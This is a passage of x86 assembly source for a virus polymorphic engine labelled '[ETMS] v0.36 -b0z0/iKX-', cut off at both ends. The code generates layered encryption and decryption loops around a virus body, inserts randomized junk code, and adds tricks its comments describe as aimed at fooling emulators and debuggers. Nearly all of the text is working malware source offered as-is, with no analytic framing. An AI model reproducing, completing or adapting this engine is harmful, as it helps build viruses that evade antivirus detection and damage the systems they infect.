; offset = * 4 sub edx,(offset t_chgpnt - offset o_table) pop eax push eax push ecx push esi mov ecx,dword ptr [esi+edx] add ecx,ebp call ecx ; call the routine to do it pop esi pop ecx pop eax loop ok_counts ; finished decryption loop, needs just the jump backwards call rnd_garbage mov al,0e9h stosb xor eax,eax xchg eax,dword ptr [esi - (offset t_chgpnt - offset w_loopbg)] ; the jump back to start of sub eax,04h ; the decryptor and enable sub eax,edi ; overwriting on loop :) stosd call rnd_garbage call rnd_garbage lea esi,[offset v_lenght + ebp] push edi ; write the offset of the exit jump mov edx,dword ptr [esi - (offset v_lenght - offset t_chkpos)] sub edi,edx mov dword ptr [edx-4],edi pop edi ; now decryption loop generation is finished mov byte ptr [esi - (offset v_lenght - offset r_used)],10h ; can use all regs (except ESP) again call rnd_garbage ; unencrypted one, some more here call rnd_garbage push edi call rnd_garbage ; encrypted garbage pop ecx neg ecx add ecx,edi ; how much encrypted garbage mov edx,ecx sub edi,edx add ecx,dword ptr [esi] shr ecx,2 ; so it will be enough for b/w/d enc inc ecx shl ecx,2 movzx eax,byte ptr [esi - (offset v_lenght - offset t_prejmp)] add ecx,eax ; decs before cmp, so we reach equality pop eax neg eax add eax,edi ; lenght of decryptor add eax,edx ; total displacement for this layer push eax ; so we can correct mem refs sub eax,edx add eax,dword ptr [esi - (offset v_lenght - offset v_runnin)] ; running offset push esi add esi,dword ptr [esi - (offset v_lenght - offset layer_nr)] mov ebx,dword ptr [esi - (offset v_lenght - offset enc_space) + 12] pop esi cmp byte ptr [esi - (offset v_lenght - offset t_fromend)],00h pushf je no_adding add eax,ecx ; from end no_adding: sub eax,dword ptr [esi - (offset v_lenght - offset t_pntoff)] ; - pointer offset if is there mov dword ptr [ebx+1],eax ; set initial pointer mov ebx,dword ptr [esi - (offset v_lenght - offset w_counter)] inc ebx mov eax,dword ptr [esi - (offset v_lenght - offset t_cntoff)] add eax,ecx mov dword ptr [ebx],eax cmp byte ptr [esi - (offset v_lenght - offset t_countback)],01h je not_negcnt neg dword ptr [ebx] not_negcnt: mov ebx,edi ; pointer on code to encrypt add edi,edx ; + encrypted garbage popf je no_adding2 add ebx,ecx ; add lenght if from end no_adding2: ; save layer data (cnt and pnt) in its entry push esi add esi,dword ptr [esi - (offset v_lenght - offset layer_nr)] mov dword ptr [esi - (offset v_lenght - offset enc_space) +4],ecx mov dword ptr [esi - (offset v_lenght - offset enc_space) +8],ebx pop esi push esi mov esi,dword ptr [esi - (offset v_lenght - offset v_virusp)] push ecx sub ecx,edx rep movsb ; copy what to encrypt pop edx pop esi pop eax ; this layer lenght to sum mov ecx,dword ptr [esi - (offset v_lenght - offset layer_nr)] corr_addr: cmp ecx,tl_space ; correct the adresses of the lower layers je corr_end add ecx,l_space add [esi - (offset v_lenght - offset enc_space) + ecx + 12d],eax add [esi - (offset v_lenght - offset enc_space) + ecx + 8d],eax mov ebx,[esi - (offset v_lenght - offset enc_space) + ecx + 12d] add dword ptr [ebx + 1],eax ; pointer from decryptor jmp corr_addr corr_end: mov ecx,dword ptr [esi - (offset v_lenght - offset layer_end)] cmp dword ptr [esi - (offset v_lenght - offset layer_nr)],ecx je finished_layers sub dword ptr [esi - (offset v_lenght - offset layer_nr)],l_space pop ecx ; initial EDI push ecx push ecx push ecx sub ecx,edi ; calculate new lenght to encrypt neg ecx pop edi push ecx mov esi,dword ptr [esi - (offset v_lenght - offset orig_dx)] xchg esi,edi mov edx,edi push esi rep movsb ; copy to temp space and use that one pop edi ; as source for next layer mov esi,edx pop ecx jmp start_layer ; construct next encryption layer finished_layers: ; now in reverse order ; create each encryption layer mov eax,dword ptr [esi - (offset v_lenght - offset layer_end)] sub esi,(offset v_lenght - (offset enc_space + 10h) - tl_space) push edi enc_nl: mov ecx,enc_max ; the stored regs lea edi,[ebp + offset enc_space_final] rep movsb pusha lea edi,[ebp + offset enc_space_final] __p2: cmp 4 ptr [edi-2], 0FFFFD20Bh jz __p1 inc edi jmp __p2 __p1: mov al, 74h stosb stosb lea eax, [ebp+exit_space_final] sub eax, edi mov 1 ptr [edi-1], al popa mov ecx, [esi - enc_max - 16] ; key value mov edx, [esi - enc_max - 12] ; counter mov ebx, [esi - enc_max - 8] ; pointer sub esi, (l_space + enc_max) ; on next layer ; layer chunk, most of it will be overwritten by the one in the structure enc_max equ 24h ; lenghts ; 6 = max encryption operation ; 4 = max 4 inc/dec counter ; 4 = max 4 inc/dec counter ; 3 * 6 = max 3 * 6 byte key change operations ; 4 = check on edx + jump short enc_space_final: db enc_max dup (90h) ; here the encryptor will be placed jmp enc_space_final exit_space_final: add eax,l_space ; next layer structure cmp eax,(tl_space + l_space); last layer to do? jne enc_nl ll_end: pop ecx ; the final edi pop edi ; calling edi sub ecx,edi ; total lenght ret ; poly finished ; - ETMS return point poly_name db '[ETMS] v0.36 -b0z0/iKX-' put_encloop_2: push ecx xor ecx,ecx inc ecx inc ecx jmp short put_encloop put_encloop_1: push ecx xor ecx,ecx inc ecx put_encloop: ; ecx nr of bytes push eax xchg edi,dword ptr [w_encrypt+ebp] ; in EDI where we are in enc ; and save dec position copy_it: stosb shr eax,8 loop copy_it xchg dword ptr [w_encrypt+ebp],edi ; save next and restore dec pnt pop eax pop ecx ret o_table: o_counter dd offset ch_counter o_pointer dd offset ch_pointer o_key dd offset ch_key o_mate dd offset ch_mate o_exitjmp dd offset ch_exitjmp ch_exitjmp: ; compare and exit jump for dec loop xor eax,eax inc eax mov ecx,dword ptr [esi - (offset t_chgpnt - offset t_cntoff)] or ecx,ecx jnz must_compare ; is + a constant ? get_checker: call get_random and eax,0fh cmp al,09d ja get_checker must_compare: shr al,1 pushf mov ah,byte ptr [eax + offset chk_counter + ebp] ; get comparer add ah,byte ptr [esi - (offset t_chgpnt - offset r_counter)] mov al,81h popf jc store_d00 inc eax inc eax stosw xor al,al stosb jmp make_jumps store_d00: stosw xchg eax,ecx cmp byte ptr [esi - (offset t_chgpnt - offset t_countback)],01h je not_negcnt1 neg eax not_negcnt1: stosd make_jumps: mov ax,840fh ; jz long stosw stosd mov dword ptr [esi - (offset t_chgpnt - offset t_chkpos)],edi done_cond: xchg edi,dword ptr [esi - (offset t_chgpnt - offset w_encrypt)] mov ax,0d20bh stosw mov al, 0FFh ; BUG were here stosb stosb xchg edi,dword ptr [esi - (offset t_chgpnt - offset w_encrypt)] ret ch_counter: ; decrement/increment counter cmp byte ptr [esi - (offset t_chgpnt - offset t_exitjmp)],00h je no_pntchgndd inc byte ptr [esi - (offset t_chgpnt - offset t_prejmp)] no_pntchgndd: mov ah,byte ptr [esi - (offset t_chgpnt - offset r_counter)] mov al,byte ptr [esi - (offset t_chgpnt - offset t_countback)] mov cl,0ah ; edx + always dec in encryptor jmp mk_incdec ch_pointer: ; increment/decrement pointer mov ah,byte ptr [esi - (offset t_chgpnt - offset r_pointer)] mov al,byte ptr [esi - (offset t_chgpnt - offset t_fromend)] mov cl,03h ; using ebx in encryptor ; jmp mk_incdec mk_incdec: ; al = 0 means dec, 1 means inc ; ah = register to use ; cl = oring for encryptor shl al,3 or al,40h or al,ah push eax push eax ; will need this one for encryptor call get_random_al7 ; how enc/dec stuff ? shr al,1 jnc lbl_hh pop eax jmp set_enc_id_pre ; do with inc/dec lbl_hh: shr al,1 mov al,083h ; common prefix stosb pop eax jc do_with_sub ; do with add (either +1 or +(-1)) or ah,0c0h and al,8h ; was decrementing ? jnz use_minus1 jmp use_plus1 do_with_sub: or ah,0e8h and al,08h ; was incrementing jz use_minus1 use_plus1: xor al,al ; 01h inc al jmp set_enc_id_pre2 use_minus1: xor al,al ; 0ffh dec al set_enc_id_pre2: xchg ah,al stosb xchg ah,al set_enc_id_pre: stosb set_enc_id: pop eax and al,(NOT 0111b) or al,cl jmp put_encloop_1 ; put in encryptor and go away ch_key: ; change key register cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],20h je exit_keychange get_modifier: call get_random_al7 mov cl,al mov ah,byte ptr [eax + offset key_changers + ebp] mov al,81h ; add/sub/xor base cmp cl,3 jb no_rrrr mov al,0c1h ; rol/ror base cmp cl,5 jne no_rrrr mov al,0f7h no_rrrr: push eax reget_ksize: call get_random ; select if byte/word/dword and al,011b jz reget_ksize cmp cl,05h ; inc dec just on dw and dd jbe isntincdec cmp al,01h je reget_ksize isntincdec: cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],3 jbe canall cmp al,01b ; byte keychange only for ax,cx,dx,bx je reget_ksize canall: mov ch,al mov dl,ah ; random stuff pop eax cmp ch,01h jne no_decbyte dec al shr dl,1 jc no_decbyte add ah,04h ; work on high byte no_decbyte: cmp ch,02h jne no_wordprefix push eax mov al,66h stosb call put_encloop_1 pop eax no_wordprefix: cmp cl,06h pushf jb no_incdecch ; inc/dec has just one byte opcode dec edi mov al,byte ptr [edi] no_incdecch: popf push eax jb no_nopneeded mov al,ah or al,1 ; ecx key in enc loop call put_encloop_1 ; for inc/dec jmp short after_store no_nopneeded: or ah,1 ; key is ECX in enc loop call put_encloop_2 after_store: pop eax or ah,byte ptr [esi - (offset t_chgpnt - offset r_regkey)] stosw cmp cl,05 ; inc/dec/not doesn't need any key jae exit_keychange call get_random cmp cl,03 jae just_one_bk ; ror/rol just one byte key cmp ch,01h je just_one_bk ; check dimension of key modifier stosb call put_encloop_1 shr eax,8h cmp ch,02h je just_one_bk stosw call put_encloop_2 shr eax,10h just_one_bk: stosb call put_encloop_1 exit_keychange: ret ch_mate: ; creates the decryption math operation xor edx,edx mov ecx,5h type_sel: cmp eax,ecx jbe ok_regs inc edx sub eax,ecx jmp type_sel ; get type and size.. in EDX size, in EAX type ; edx = 0 for byte, 1 for word, 2 for dword ok_regs: cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],20h lea esi,[offset _math_imm + ebp] je without_key add esi,(offset _math_key - offset _math_imm) without_key: dec eax ; type - 1 push esi push eax shl eax,1 ; each type is a word add esi,eax lodsw ; ax = mathop word cmp dl,1 jne not_word push eax mov al,066h stosb call put_encloop_1 pop eax not_word: or dl,dl jnz not_byte dec al not_byte: pop ebx ; type - 1 pop esi ; push ebx push eax neg ebx add ebx,4 ; get opposite math operation shl ebx,1 add esi,ebx lodsw lea esi,[offset r_regkey + ebp] cmp byte ptr [esi],20h je ok_regskey cmp al,0d3h je ok_regskey add ah,08h ; since ECX is used as key ok_regskey: or dl,dl jnz not_byterev dec al not_byterev: add ah,03h ; in enc loop using EBX call put_encloop_2 pop eax mov cl,byte ptr [esi - (offset r_regkey - offset r_pointer)] cmp cl,03h ; eax-ebx ja upper_ones add ah,cl jmp ok_register_p upper_ones: add ah,06h cmp cl,06h ; esi je ok_register_p inc ah cmp cl,07h ; edi je ok_register_p add ah,03eh ; ebp ok_register_p: pop ecx ; type-1 cmp dword ptr [esi - (offset r_regkey - offset t_pntoff)],0 je not_plusoff add ah,80h not_plusoff: stosw xor eax,eax cmp byte ptr [esi],20h ; using key? je ok_register_k or cl,cl je check_rr cmp cl,4 jne not_rol_ror check_rr: cmp byte ptr [esi],1 ; is key CX (cl) je ok_register_k mov al,10h ; if not put just immediate sub byte ptr [edi-2],12h mov ebx,dword ptr [esi - (offset r_regkey - offset w_encrypt)] sub byte ptr [ebx-2],12h push ecx mov bl,20h xchg bl,byte ptr [esi] ; won't use key reg anymore in the call unset_used ; future, so use for garbage pop ecx jmp short ok_register_k not_rol_ror: mov al,byte ptr [esi] shl eax,3 ; * 8 add byte ptr [edi-1],al ; key register ok_register_k: cmp byte ptr [esi - (offset r_regkey - offset r_pointer)],05h jne not_usingbp mov byte ptr [edi],00h inc edi not_usingbp: mov eax,dword ptr [esi - (offset r_regkey - offset t_pntoff)] or eax,eax jz no_offsetadd stosd no_offsetadd: cmp byte ptr [esi],20h jne no_key_needed push esi add esi,dword ptr [esi - (offset r_regkey - offset layer_nr)] mov eax,dword ptr [esi - (offset r_regkey - offset enc_space)] pop esi or cl,cl je byte_key cmp cl,4 je byte_key or dl,dl je byte_key stosb call put_encloop_1 shr eax,8 dec dl jz byte_key stosw call put_encloop_2 shr eax,10h byte_key: stosb call put_encloop_1 no_key_needed: ret rnd_garbage: push ecx push eax call get_random and eax,0fh ; max - 1 inc eax ; not zero xchg eax,ecx garbager: ; ecx how many push edx push ebx garbager_loop: push ecx get_op_type: call get_random ; how many possible types and eax,garbage_mask cmp eax,garbage_number ja get_op_type mov ecx,[(eax*4)+offset garbage_offsets+ebp] add ecx,ebp call ecx ; call garbage routine pop ecx loop garbager_loop mov eax,dword ptr [t_pushed+ebp] cmp eax,000005h ; if not in a call, not in a jump and ja stack_is_ok ; pushed <=5 or eax,eax jz stack_is_ok inc byte ptr [t_inacall+ebp] cmp al,01h ja direct_addesp call do_pop_nocheck jmp stack_is_ok direct_addesp: push eax ; then correct stack mov ax,0c483h ; add esp,nr_dd * 4 stosw pop eax call force_popall stack_is_ok: pop ebx pop edx pop eax pop ecx ret do_push: cmp byte ptr [t_pushed+ebp],05h ; max dwords on the stack ja exit_pusher inc byte ptr [t_pushed+ebp] call get_random ; 4 types of pushing and al,011b jz push_register ; normal push reg dec al jz push_immediate_dd ; push immediate double dec al jz push_immediate_by ; push immediate byte mov ax,35ffh ; push immediate from memory stosw call get_address jmp pre_exit_dd push_immediate_by: mov al,6ah stosb shr ah,1 jc zero_or_menouno bswap eax jmp pre_exit_pusher zero_or_menouno: ; very usual pushes xchg ah,al and al,01b ; so we will get 0 or -1 dec al ; to LARGE 0 or to LARGE -1 jmp pre_exit_pusher push_immediate_dd: mov al,68h stosb call get_random pre_exit_dd: stosd ; normal push as double jmp exit_pusher push_register: call get_random_al7 add al,050h pre_exit_pusher: stosb exit_pusher: jmp exit_ppc do_pop: cmp byte ptr [t_pushed+ebp],00h je return_nopop do_pop_nocheck: call get_random shr al,1 jnc popintoreg2 mov ax,0c483h ; add esp, stosw get_number: call get_random_al7 jz get_number cmp al,byte ptr [t_pushed+ebp] ja get_number force_popall: sub byte ptr [t_pushed+ebp],al shl al,2 ; dd are pushed, so * 4 jmp store_ngo2 popintoreg2: call get_register add cl,058h ; pop in a register xchg eax,ecx dec byte ptr [t_pushed+ebp] store_ngo2: stosb return_nopop: jmp exit_ppc call_subroutines: cmp word ptr [t_maxjmps+ebp],0h ; don't nest too much nor jne just_exit_call ; put pushes/pops in subs and ; we can't know wassup in ; conditional jumps and such inc byte ptr [t_inacall+ebp] call get_random_al7 cmp al,01h ; 00h and 01h push jbe do_push cmp al,05 ; 02h - 05h pops (more probable so final stack jbe do_pop ; correction should be needed less often) ; 06,07 do a call mov al,0e8h stosb stosd ; place for offset push edi call rnd_garbage pop ebx mov al,0e9h stosb stosd ; jump offset push edi call krappo_gen ; random bytes call rnd_garbage push ebx neg ebx add ebx,edi xchg eax,ebx pop ebx mov dword ptr [ebx-4],eax ; call offset call rnd_garbage ; this is the called "subroutine" call get_random ; more ways of getting back from subroutine, shr al,1 ; either with normal ret or by correcting the jnc normal_ret ; stack by popping or by adding to esp shr al,1 jnc popintoreg mov ax,0c483h ; add esp, stosw mov al,4 jmp store_ngo popintoreg: call get_register add cl,058h ; pop base xchg eax,ecx jmp store_ngo normal_ret: mov al,0c3h ; ret stosb bswap eax ; some random and eax,07h cmp al,4 jb do_the_int3s jne no_ccs random_crap: call krappo_gen jmp no_ccs do_the_int3s: xchg eax,ecx mov al,0cch ; int3, usual after subroutines in win32s rep stosb store_ngo: stosb no_ccs: call rnd_garbage pop ebx ; jump offset push ebx neg ebx add ebx,edi xchg eax,ebx pop ebx mov dword ptr [ebx-4],eax exit_ppc: dec byte ptr [t_inacall+ebp] just_exit_call: ret maths_immediate_short: stc jmp maths_immediate_1 maths_immediate: clc maths_immediate_1: pushf call get_random ; (0 to 7) * 8 and al,0111000b add al,0c0h ; the base popf push eax pushf call get_register add al,cl mov ah,81h ; prefix popf pushf jnc not_a_shortone inc ah inc ah not_a_shortone: xchg ah,al stosw call g_dimension popf jnc not_a_shortone2 mov cl,01h not_a_shortone2: call put_immediates pop eax cmp al,0f8h ; is a CMP jne not_compare make_jmp_after_cmp: call get_random and eax,01b ; long or short jump add al,06h ; short jump jmp make_jump not_compare: ret cdq_jmps_savestack: call get_random_al7 sub al,3 jc exit_c_j_ss xchg eax,ecx mov al,byte ptr [ecx+offset change_jump+ebp] cmp cl,1 ja not_cdq_cbw test byte ptr [r_used+ebp],0101b ; EAX and EDX for cbw,cwd,cdq,cwde jnz exit_c_j_ss stosb inc edi call g_dimension dec edi jmp exit_c_j_ss not_cdq_cbw: cmp cl,4 je pushandmov add cl,4 ; this is used for dimension jmp do_that_fjump ; do as for conditional ones pushandmov: call select_save jc exit_c_j_ss xchg eax,ebx mov al,50h ; push xor ch,ch ; so it won't be erased from stack xchg ch,byte ptr [t_pushed+ebp] push ecx call unset_used ; mark that as unused one add al,bl ; push the reg stosb call rnd_garbage add al,08h ; pop opcode stosb pop ebx mov byte ptr [t_pushed+ebp],bh mov byte ptr [r_used+ebp],bl exit_c_j_ss: ret gen_one_byters: call get_random_al7 make_jump: mov cl,al mov al,byte ptr [eax+offset one_byters+ebp] ; get onebyter cmp cl,05h jbe not_jump do_that_fjump: cmp byte ptr [t_maxjmps+ebp],3 ; don't nest too much je just_exit inc byte ptr [t_maxjmps+ebp] cmp al,0e9h ; for unconditional ones skip some jae skip_unc ; things cmp cl,07h jne not_longjump push eax mov al,0fh ; long prefix stosb pop eax not_longjump: push eax call get_random and al,0fh mov ch,al pop eax add al,ch skip_unc: stosb ; type of jump stosb ; first off cmp cl,07h jne not_longone dec edi stosd not_longone: push edi call rnd_garbage pop ebx mov eax,edi sub eax,ebx ; offset of jump dec byte ptr [t_maxjmps+ebp] cmp cl,7 je long_jumper cmp eax,7fh ; if not too big then use it jb good_jump mov edi,ebx ; else forget everything dec edi dec edi ret good_jump: mov byte ptr [ebx-1],al ret long_jumper: mov dword ptr [ebx-4],eax ret not_jump: stosb just_exit: ret mem_assign: mov ax,058bh jmp mem_common mem_mathops: call get_random and al,111000b ; (0 to 7) * 8 add al,03h ; base mem_common: push eax call get_register shl cl,3 ; *8 add cl,05h ; base for eax mov ah,cl stosw call g_dimension ; now offset call get_address stosd pop eax cmp al,3bh ; is a cmp je make_jmp_after_cmp ; if so force a compare ret diff_movz: ; movsx,movzx,bt,btc,btr,bts,bswap call get_random ; 1 bit dim, 2 bit m/b mov cl,al mov dh,ah test cl,1100000b jnz no_wpf mov al,066h stosb no_wpf: mov al,0fh stosb mov al,0b6h shr cl,1 jc some_bt shr cl,1 jc zero_extend add al,08h zero_extend: shr cl,1 jc dest_dw ; generate movsx/movzx on d or w inc al dest_dw: stosb call get_random_al7 mov dl,al add al,0c0h call get_register shl cl,3 add al,cl and dh,011b pushf jnz just_regs sub al,0c0h-05h sub al,dl just_regs: stosb popf jnz justret_r call get_address stosd justret_r: ret some_bt: shr cl,1 jc do_bswap add al,04h ; btX second byte stosb and cl,011000b add cl,0e0h mov al,cl call get_register add al,cl stosb shr dh,1 pushf ; make jmp after or not and dh,01fh ; not much sense doing > 32 mov al,dh stosb popf jc make_jmp_after_cmp ret do_bswap: call get_register mov al,0c8h ; bswap add al,cl stosb ret mov_registers: call get_random_al7 ; random source add al,0c0h mov ah,08bh call get_register ; useful dest shl cl,3 add al,cl xchg ah,al stosw jmp g_dimension maths_registers: call get_random and al,0111000b add al,03h ; base mov ah,0c0h ; suff push eax call get_register ; dest shl cl,03h add ah,cl xchg eax,ecx ; save temp in ecx call get_random_al7 ; all regs xchg eax,ecx ; reg in ECX and restore EAX add ah,cl stosw call g_dimension pop eax cmp al,3bh je make_jmp_after_cmp ret rotating_imms: call get_random_al7 cmp al,0110b ; 0f0 doesn't exist je rotating_imms shl al,3 ; *8 add al,0c0h call get_register add al,cl mov ah,0c1h xchg al,ah stosw call g_dimension xor ecx,ecx inc cl jmp put_immediates notneg_register: call get_random shr al,1 mov ax,0d0f7h jc not_add add ah,08h not_add: call get_register add ah,cl stosw ; jmp g_dimension g_dimension: ; EDI after generated garb reget_dim: call get_random_al7 cmp al,2 jae no_change word_change: mov ecx,dword ptr [edi-2] mov byte ptr [edi-2],66h ; the prefix mov dword ptr [edi-1],ecx inc edi mov al,2 jmp post_no_change no_change: mov al,4 post_no_change: xchg eax,ecx ; in ECX needed immediates ret imm_assign: call get_register mov al,0b8h ; base add al,cl stosb inc edi call g_dimension dec edi ; jmp put_immediates put_immediates: ; cl how many call get_random put_imm_part: stosb shr eax,8 loop put_imm_part ret inc_dec_reg: call get_random and al,01000b ; 0 or 8 add al,40h ; incdec generation call get_register add al,cl stosb inc edi call g_dimension dec edi ret xchg_regs: mov al,087h ; xchg eax,eax call get_register mov ah,cl call get_register common_test_xchg: shl cl,3 add ah,cl add ah,0c0h stosw jmp g_dimension test_regs: call get_random xchg eax,ecx and cx,0707h mov ah,ch mov al,085h ; test eax,eax jmp common_test_xchg temp_save_change: call get_random_al7 sub al,6 ; 1/4 probability, since this couldn't jc skip_changer ; come too often call select_save jc skip_changer push ecx call save_mov_xchg xchg eax,ecx ; in al new register mov al,byte ptr [edx] ; imp_reg shl al,3 xchg eax,ecx add al,cl or al,0c0h xchg al,ah stosw ; mov important_reg,some_reg pop ebx mov byte ptr [r_used+ebp],bl ; restore regs status skip_changer: ret select_save: call get_random_al7 sub al,5 ; get from 0 to 2 jc select_save xchg eax,edx add edx,offset r_pointer add edx,ebp mov al,byte ptr [edx] cmp al,0ffh ; not already assigned? je exit_bad cmp al,20h ; no key signature, if so skip je exit_bad call is_used ; maybe is already saved on stack or jnz return_good ; such? exit_bad: stc ret return_good: mov cl,byte ptr [r_used+ebp] clc ret save_mov_xchg: xchg eax,ebx call get_register ; get an usable register xchg eax,ecx call set_used ; set this one as used call unset_used ; and the previous as unused mov ah,087h ; xchg reg,reg base push eax xor ecx,ecx call get_random ; select if using mov or xchg shr al,1 jc use_mov_first mov cl,4 ; + 4 becames mov reg,reg base use_mov_first: shr al,1 ; when just saving this won't be used jc use_mov_after ; select whichone for restore aswell mov ch,4 use_mov_after: pop eax add ah,ch ; restore one push eax sub ah,ch add ah,cl shl al,3 ; * 8 add al,bl or al,0c0h ; mov some_reg,important_reg xchg al,ah stosw ; put the moving of regs call rnd_garbage pop eax ret sets_misc: call get_random ; type of sel mov al,0fh and ah,al add ah,090h call get_register cmp cl,3 ja cant_useset ; won't retry, so not too many stosw bswap eax ; rnd shr al,1 jc docs_ones add cl,08h ; has 2 set of ocodes docs_ones: shr al,1 jc low_ones add cl,04h ; high or low 8 low_ones: mov al,0c0h add al,cl stosb ret cant_useset: ; shld/shrd test ah,110b ; last bit used later jnz no_66p push eax mov al,066h ; with words stosb pop eax no_66p: shr ah,1 mov ah,0a4h jc do_shlld add ah,0ch-04h ; shrd do_shlld: cmp cl,7 jne noss_with_cl inc ah ; with immediate cl noss_with_cl: stosw call get_random and al,0111000b call get_register add al,cl add al,0c0h ; in ah we have rnd sh nr stosb test byte ptr [edi-2],01b ;was using cl? jnz wasnt_with_cl dec edi stosw wasnt_with_cl: ret xadd_cmpxchg: call get_random and ah,10h ; 10h or 00h jc np_nchk test byte ptr [ebp+r_used],01b ; is ax used? jnz home_xx ; if so no cmpxchg np_nchk: test al,110b jnz no_66pr mov al,66h stosb no_66pr: add ah,0b1h cmp byte ptr [edi-1],066h je cant_byterize and al,1 sub ah,al ; cmpxchg or xadd with b or notb cant_byterize: mov al,0fh stosw get_reg1: call get_register mov ch,cl get_reg2: call get_register mov al,0c0h test byte ptr [edi-1],01b ; was using bytes? jnz no_byteprob cmp ch,3 ; if bytes must be <= 3 ja get_reg1 cmp cl,3 ja get_reg2 push eax bswap eax ; high part of rnd and ax,010000000100b ; random +4 on both src and dest add cx,ax pop eax no_byteprob: shl cl,3 add al,cl add al,ch stosb home_xx: ret emu_stuffy: ; some stuff to try to fool emus call get_random and al,011111b ; not too often jnz keep_few_ae lea edx,[ebp + offset t_pushed] shr ah,1 jc regs_checking shr ah,1 jc xlat_generation stack_checking: ; check if stack seems consistent or not mov al,68h ; push immediate opcode stosb call get_random stosd push eax xor ch,ch ; nr of dword on stack xchg ch,byte ptr [edx] ; don't smash our stack call rnd_garbage call get_register mov al,cl call set_used mov bl,al add al,058h ; pop opcode stosb mov byte ptr [edx],ch ; can work on stack again call rnd_garbage call unset_used typepopchk: call get_random shr al,1 jnc check_posones and ah,100000b ; add/and reg32, not/neg imm jnz just_not_atesp dec dword ptr [esp] ; since add needs the neg value just_not_atesp: not dword ptr [esp] ; the imm add ah,0c0h jmp chksta_st check_posones: and ah,011000b jz typepopchk add ah,0e0h chksta_st: mov al,81h ; cmp/sub/xor reg32,imm add ah,bl stosw pop eax ; value to check with stosd check_okequ: mov bx,07574h jmp do_jumpzh regs_checking: shr ah,1 jc ss_play shr ah,1 jc mem_write ; ones just checking our regs (pointer and counter) consistency ; compare with zero in various ways and jump at the right code if != cmp dword ptr [edx - (offset t_pushed - offset w_loopbg)],00h ; not in the loop jne keep_few_ae bswap eax and eax,01b ; 0 or 1 add eax,ebp add eax,offset r_pointer ; so will be r_pointer or r_counter mov al,byte ptr [eax] inc al ; already initialized ? jz keep_few_ae dec al call is_used ; check that we aren't in moving thingy jz keep_few_ae reran_h: call get_random_al7 ; type of cmp cmp al,5 jae or_oring ; do or reg,reg lea ebx,[edx - (offset t_pushed - offset chk_counter)] add ebx,eax ; which one mov ah,byte ptr [ebx] mov al,83h add ah,cl stosw xor al,al stosb ; with a zero jmp do_jumpzh_reg or_oring: mov ax,0c00bh ; or eax,eax base add ah,cl ; have in cl the reg shl cl,3 add ah,cl ; both src and dest stosw do_jumpzh_reg: mov bx,07475h ; JZ and JNZ creation (considering BH is okay, while BL makes shit) do_jumpzh: call get_random shr al,1 ; do jz or jnz ? jnc do_jz_easily ; else we have to do a construction with ; more sense mov al,bl stosw too_long_redo: push dword ptr [edx] ; save stack situation mov ebx,edi ; jmp offset +1 call rnd_garbage call get_random ; random byte to break execution or ret shr ah,1 jc no_jmpback ; do a long jmp back to hide the loop one mov al,0e9h stosb or ax,0ffffh ; not too long bswap eax or ah,0f8h stosd jmp comehome no_jmpback: shr ah,1 jnc rndbyteuse mov al,0c3h ; a ret is quite polite for the emu :) rndbyteuse: stosb comehome: call rnd_garbage pop dword ptr [edx] mov eax,edi sub eax,ebx cmp eax,07fh ; see it is not too long for a short jmp jbe oki_lenght mov edi,ebx ; else retry jmp too_long_redo oki_lenght: mov byte ptr [ebx-1],al jmp keep_few_ae do_jz_easily: mov al,bh ; jz short to some random location stosw keep_few_ae: ret xlat_generation: ; is xlat emulated? anyway, hc garbage :) shr ah,1 jnc enter_generation test byte ptr [edx - (offset t_pushed - offset r_used)],01001b jnz keep_few_ae ; are ebx and eax unused ? mov al,0bbh ; mov ebx stosb push edx call get_address ; a decent mem addy stosd pop edx ; set ebx as used or byte ptr [edx - (offset t_pushed - offset r_used)],01000b call rnd_garbage ; and then unset ebx as used and byte ptr [edx - (offset t_pushed - offset r_used)],(NOT 1000b) mov al,0d7h ; xlat opcode stosb ret enter_generation: ; some more funny garbage mov al,0c8h ; enter stosb bswap eax and al,0111100b ; requested stack stosb xor al,al stosb stosb xchg al,byte ptr [edx] ; don't smash our stack mov ah,byte ptr [edx - (offset t_pushed - offset r_used)] ; no ebp or byte ptr [edx - (offset t_pushed - offset r_used)],100000b call rnd_garbage mov byte ptr [edx],al mov byte ptr [edx - (offset t_pushed - offset r_used)],ah mov al,0c9h ; leave stosb ret ss_play: ; opcodes that modify SS (actually they don't change it, but will ; make life harder for debuggers and some emus hopefully) shr ah,1 jc with_regs_ssplay ; first way, just push ss and then pop ss later mov al,016h ; push stosb xor ah,ah xchg ah,byte ptr [edx] ; don't smash our stack call rnd_garbage xchg ah,byte ptr [edx] inc al ; pop stosb ret with_regs_ssplay: ; mov reg,ss and later mov ss,reg and ah,011b jnz no_66pfss mov al,066h ; is oky anyway stosb no_66pfss: call get_register mov ax,0d08ch ; mov reg,ss add ah,cl stosw xchg eax,ecx call set_used ; don't mess with that one call rnd_garbage xchg eax,ebx call unset_used xchg eax,ecx inc al inc al ; mov ss,reg stosw ret mem_write: ; write a dd somewhere (back where we won't go :) ) and then check ; if the contents are the same after some garbage cmp byte ptr [edx - (offset t_pushed - offset m_writes)],01h ; don't nest, could work je exit_mw_r ; on same addy (should be) ; well we could even put this ; away :P inc byte ptr [edx - (offset t_pushed - offset m_writes)] call get_random ; get a register and ah,0111000b push eax add ah,05h mov al,089h stosw mov ecx,[edx - (offset t_pushed - offset t_inipnt)] restart_memsearch: mov ebx,[edx - (offset t_pushed - offset w_loopbg)] or ebx,ebx ; not in the loop jnz looping_alr cmp byte ptr [edx - (offset t_pushed - offset t_inacall)],01h ; could overwrite ourslv jne can_proceed_mw bad_mem: pop eax dec edi dec edi exit_mw: dec byte ptr [edx - (offset t_pushed - offset m_writes)] exit_mw_r: ret can_proceed_mw: mov ebx,edi ; else can do from here down, anyway ; we won't return to it and we are ; sure that layers are not back looping_alr: sub ebx,4 cmp ebx,ecx ; is there at least a bit of place? jbe bad_mem call get_random and eax,03ffh sub ebx,eax sub ebx,ecx jc restart_memsearch add ebx,[edx - (offset t_pushed - offset v_runnin)] mov eax,ebx stosd call get_random ; check what was written or not? shr al,1 ; to make less visibile maybe ;) pop eax ; the used reg jc exit_mw xchg al,ah shr al,3 call is_used pushf call set_used call rnd_garbage popf push ebx jnz wasntusedb mov ebx,eax ; if was used then nuthing, else call unset_used ; put reusable wasntusedb: shl al,3 add al,5 mov ah,03bh ; cmp reg, memval xchg ah,al stosw pop eax stosd ; the addy jmp check_okequ from_stack: ; read/write stuff from stack referencing ; with esp quite often found in windoze code call get_random ; type of operation and al,0fh cmp al,8 jae make_mov shl al,3 inc al jmp selected_op make_mov: mov 